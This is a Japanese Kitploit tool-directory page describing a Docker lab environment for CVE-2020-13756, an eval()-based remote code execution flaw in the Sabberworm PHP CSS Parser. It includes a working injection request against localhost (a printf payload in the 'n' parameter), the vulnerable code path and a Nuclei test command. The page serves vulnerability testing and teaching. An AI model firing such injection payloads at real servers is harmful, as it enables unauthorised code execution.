Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-13756-env — CVE-2020-13756(Sabberworm PHP CSS Parser RCE)用の脆弱性テスト環境 | Kitploit
ツール/GitHubGitHub/kre80r/cve-2020-13756-env
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

CVE-2020-13756(Sabberworm PHP CSS Parser RCE)用の脆弱性テスト環境

リポジトリを見る
49ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-13756 脆弱性テスト環境

CVE-2020-13756(Sabberworm PHP CSS Parser リモートコード実行)の脆弱性テスト環境です。

脆弱性の詳細

フィールド値
CVECVE-2020-13756
製品Sabberworm PHP CSS Parser
影響を受けるバージョン< 8.3.1
深刻度重大 (CVSS 9.8)
種別リモートコード実行

クイックスタート(ワンライナー)

docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

またはクローンして実行:

git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

手動セットアップ

# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

脆弱性の検証

# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

期待される出力には先頭に VULN_TEST が含まれ、コード実行が証明されます。

Nuclei でのテスト

nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

技術詳細

脆弱性は getSelectorsBySpecificity() 関数に存在し、サニタイズされていないユーザー入力を eval() に渡します:

// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')

参考情報

  • NVD
  • 修正コミット
  • Full Disclosure
  • PacketStorm

免責事項

この環境は許可されたセキュリティテスト専用です。許可なくシステムに対して使用しないでください。

作者

KrE80r - セキュリティリサーチ

ツールをダウンロード